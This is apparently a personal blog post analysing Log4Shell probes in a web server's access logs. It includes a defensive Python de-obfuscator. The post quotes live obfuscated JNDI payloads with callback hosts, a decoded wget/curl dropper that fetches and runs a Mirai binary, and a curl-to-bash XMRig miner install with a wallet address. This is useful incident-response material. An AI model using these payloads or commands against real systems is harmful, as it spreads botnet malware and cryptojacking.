By Fred Theilig – @fmtheilig
My IDS alerted me to strange behavior (obfuscated Log4j) on my web server, but rather than investigate through Security Onion, I went straight to the logs. Grepping for the offending IP, I found the following two entries:
95.214.55.244 - - [03/May/2023:11:41:23 -0400] "GET / HTTP/1.1" 403 17280 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//45.152.113.109:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL2xzY3B1IDsgY3VybCAtTyBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL2xzY3B1IDsgY2htb2QgK3ggbHNjcHUgOyBjaG1vZCA3NzcgbHNjcHUgOyAuL2xzY3B1IHJ1bm5lciA7IHN1ZG8gLi9sc2NwdSBydW5uZXIgOyBybSAtcmYgbHNjcHU=}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//45.152.113.109:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL2xzY3B1IDsgY3VybCAtTyBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL2xzY3B1IDsgY2htb2QgK3ggbHNjcHUgOyBjaG1vZCA3NzcgbHNjcHUgOyAuL2xzY3B1IHJ1bm5lciA7IHN1ZG8gLi9sc2NwdSBydW5uZXIgOyBybSAtcmYgbHNjcHU=}')"
95.214.55.244 - - [03/May/2023:21:34:23 -0400] "GET / HTTP/1.1" 403 17278 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//129.151.84.124:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL2xzY3B1IDsgY3VybCAtTyBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL2xzY3B1IDsgY2htb2QgK3ggbHNjcHUgOyBjaG1vZCA3NzcgbHNjcHUgOyAuL2xzY3B1IHJ1bm5lciA7IHN1ZG8gLi9sc2NwdSBydW5uZXIgOyBybSAtcmYgbHNjcHU=}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//129.151.84.124:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL2xzY3B1IDsgY3VybCAtTyBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL2xzY3B1IDsgY2htb2QgK3ggbHNjcHUgOyBjaG1vZCA3NzcgbHNjcHUgOyAuL2xzY3B1IHJ1bm5lciA7IHN1ZG8gLi9sc2NwdSBydW5uZXIgOyBybSAtcmYgbHNjcHU=}')"
Yeah, that's a mouthful, and very similar to what I reported back in November. Notice that each entry carries the same Base64 payload twice: these are Apache combined-format log lines, and the two quoted fields after the status code and byte count are the Referer and User-Agent headers, both stuffed with the same string. The second, near-identical entry came almost ten hours later. We have three IP addresses to look at:
95.214.55.244 – Poland
45.152.113.109 – Japan
129.151.84.124 – Cardiff, Wales (UK)
Nothing to learn there, so let's decode the Base64, which is identical in both entries:
wget http://107.172.206.114/.duck/lscpu ;
curl -O http://107.172.206.114/.duck/lscpu ;
chmod +x lscpu ; chmod 777 lscpu ;
./lscpu runner ;
sudo ./lscpu runner ;
rm -rf lscpu
We have another IP to look at, this one housing the final payload:
107.172.206.114 – Los Angeles, CA
Again, we've seen this before: download lscpu, make it executable, run it, delete it. The script does each step two ways in case the first fails: it fetches with wget and again with curl (whichever tool is installed), runs the binary with the argument runner as the current user and again via sudo in case that happens to work, and finally deletes it to cover its tracks. lscpu is the name of a standard Linux command that displays CPU information, presumably chosen so the process looks benign in a process listing. It is about 100k on my server, while this 32-bit executable is under 19k.
(SHA256: 77e54b206b632f707f03acdce2cae28f539517e50ed9c24755258106ff61c61f)
So, what actually is it? I uploaded it to VirusTotal and it lit up like a house on fire. Mirai, my friend. Ok, let’s delete that sucker.
If you need a refresher (I did), Mirai is malware that turns a Linux system into a bot controlled by a remote operator, mostly used to launch DDoS attacks. It first appeared in 2016, spreading across IoT devices (routers, IP cameras, DVRs) that still had default credentials; its authors used it to attack Minecraft servers while selling DDoS protection on the side. The source code was posted publicly later that year, and variations abound.
Is there anything else to learn from this? The
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}
nonsense is an obfuscated Log4j lookup (Log4Shell, CVE-2021-44228). ${env:NaN:-j} asks Log4j for an environment variable named NaN and, since no such variable exists, substitutes the default value after ":-", which is j; the other three pieces supply ":", "l" and ":" the same way, so after one round of substitution the string reads ${jndi:ldap://45.152.113.109:1389/TomcatBypass/Command/Base64/...}. A vulnerable Log4j that logs that string connects to the LDAP server at the plain-text IP, and that server hands back a reference that decodes and executes the Base64 command; the path format (/TomcatBypass/Command/Base64/) is the convention used by the JNDIExploit tool. So the plain-text IPs are attacker callback hosts rather than decoders, and the second entry simply points at a different callback server. But in actuality, I am no smarter than I was last fall. I'd love an explanation how that nosebleed string is actually decoded.
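As an added example (my code, not from the post or from any tool it mentions), here is a small Python de-obfuscator that walks through that decoding offline: it parses an Apache combined-format line, resolves Log4j's ${prefix:key:-default} lookups from the inside out the way a vulnerable Log4j would (env lookups against an empty environment, plus lower/upper), stops at the resulting ${jndi:...} lookup rather than following it, and then decodes the JNDIExploit-style /Command/Base64/ path to recover the dropper command and the URL it fetches the binary from. The sample log line is constructed from the first entry above; the function names are mine.

```python
"""De-obfuscate a Log4Shell (CVE-2021-44228) probe from an Apache access log.

Added example, not code from the post. It resolves Log4j-style
${prefix:key:-default} lookups offline, the way a vulnerable Log4j would,
stops at the ${jndi:...} lookup (the part that would make the network call)
and decodes the JNDIExploit-style /Command/Base64/<b64> path.
"""
import base64
import re
from typing import Optional
from urllib.parse import urlsplit

# Base64 blob exactly as it appears in the log entries quoted above.
B64_COMMAND = (
    "d2dldCBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL2xzY3B1IDsgY3VybCAtTyBodHRw"
    "Oi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL2xzY3B1IDsgY2htb2QgK3ggbHNjcHUgOyBjaG1v"
    "ZCA3NzcgbHNjcHUgOyAuL2xzY3B1IHJ1bm5lciA7IHN1ZG8gLi9sc2NwdSBydW5uZXIgOyBy"
    "bSAtcmYgbHNjcHU="
)
PAYLOAD = (
    "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}"
    "//45.152.113.109:1389/TomcatBypass/Command/Base64/" + B64_COMMAND + "}')"
)
# Constructed sample: the first entry from the post, Apache "combined" format,
# with the payload in both the Referer and the User-Agent field.
SAMPLE_LOG_LINE = (
    '95.214.55.244 - - [03/May/2023:11:41:23 -0400] "GET / HTTP/1.1" 403 17280 '
    '"' + PAYLOAD + '" "' + PAYLOAD + '"'
)

COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) '
    r'(?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# An innermost ${...} lookup: its body contains no further "${".
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{jndi:([^}]+)\}")


def resolve_lookups(text: str, env: Optional[dict] = None, max_passes: int = 20) -> str:
    """Resolve nested Log4j lookups inside-out, leaving ${jndi:...} untouched.

    Supports env:, lower:, upper: and the ":-default" fallback, which is all
    the obfuscation in the post needs. Unknown lookups without a default are
    left as-is, so the loop always terminates.
    """
    env = env or {}  # empty by default: ${env:NaN} is unset, as on the victim

    def substitute(m) -> str:
        body = m.group(1)
        prefix, _, rest = body.partition(":")
        if prefix == "jndi":
            return m.group(0)  # keep the payload visible; never "resolve" it
        key, has_default, default = rest.partition(":-")
        if prefix == "env":
            value = env.get(key)
        elif prefix == "lower":
            value = key.lower()
        elif prefix == "upper":
            value = key.upper()
        else:  # ${::-x} and any lookup we do not model
            value = None
        if value is None:
            return default if has_default else m.group(0)
        return value

    for _ in range(max_passes):
        new_text = INNERMOST.sub(substitute, text)
        if new_text == text:
            break
        text = new_text
    return text


def decode_jndiexploit_command(url: str) -> Optional[str]:
    """Decode the .../Command/Base64/<b64> path convention used by JNDIExploit."""
    m = re.search(r"/Command/Base64/([A-Za-z0-9+/=]+)$", url)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-8", errors="replace")


def analyze(log_line: str) -> dict:
    """Parse one combined-format line and report every JNDI lookup it carries."""
    m = COMBINED.match(log_line)
    if not m:
        raise ValueError("not an Apache combined-format line")
    findings = []
    for field in ("req", "referer", "ua"):
        resolved = resolve_lookups(m.group(field))
        for url in JNDI.findall(resolved):
            parts = urlsplit(url)
            command = decode_jndiexploit_command(url)
            stage2 = sorted(set(re.findall(r"https?://\S+", command))) if command else []
            findings.append({
                "field": field,
                "jndi_url": url,
                "callback": (parts.scheme, parts.hostname, parts.port),
                "command": command,
                "stage2_urls": stage2,  # where the dropper fetches the binary from
            })
    return {"src_ip": m.group("ip"), "status": int(m.group("status")), "findings": findings}


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG_LINE)
    print(report["src_ip"], report["status"])
    for f in report["findings"]:
        print(f["field"], "->", f["callback"])
        print("   ", f["command"])
```

Run against the sample line it reports two findings (Referer and User-Agent), each calling back to ldap://45.152.113.109:1389 and each carrying the same wget/curl dropper that pulls http://107.172.206.114/.duck/lscpu. The same resolver also handles the other common Log4Shell disguises such as ${${lower:J}ndi:${::-l}dap://...}, which is why it is worth running over the Referer and User-Agent fields of your own logs rather than grepping for the literal string "jndi".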
But there is nothing for me to worry about. I don’t use Log4J, I am hyper vigilant with my patching, and my server responded with code 403. Except I got three more log entries on May 5, but with a different payload:
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 486xqw7ysXdKw7RkVzT5tdSiDtE6soxUdYaGaGE1GoaCdvBF7rVg5oMXL9pFx3rB1WUCZrJvd6AHMFWipeYt5eFNUx9pmGN
This is the C3Pool install script for XMRig, a Monero crypto miner; the long argument is the attacker's Monero wallet address (beginning 486xqw7), where the mining proceeds would go. And my server responded with a 200. That's not to say that the code was executed. It couldn't have, and there is no trace of c3pool on the server, but it did make me pause.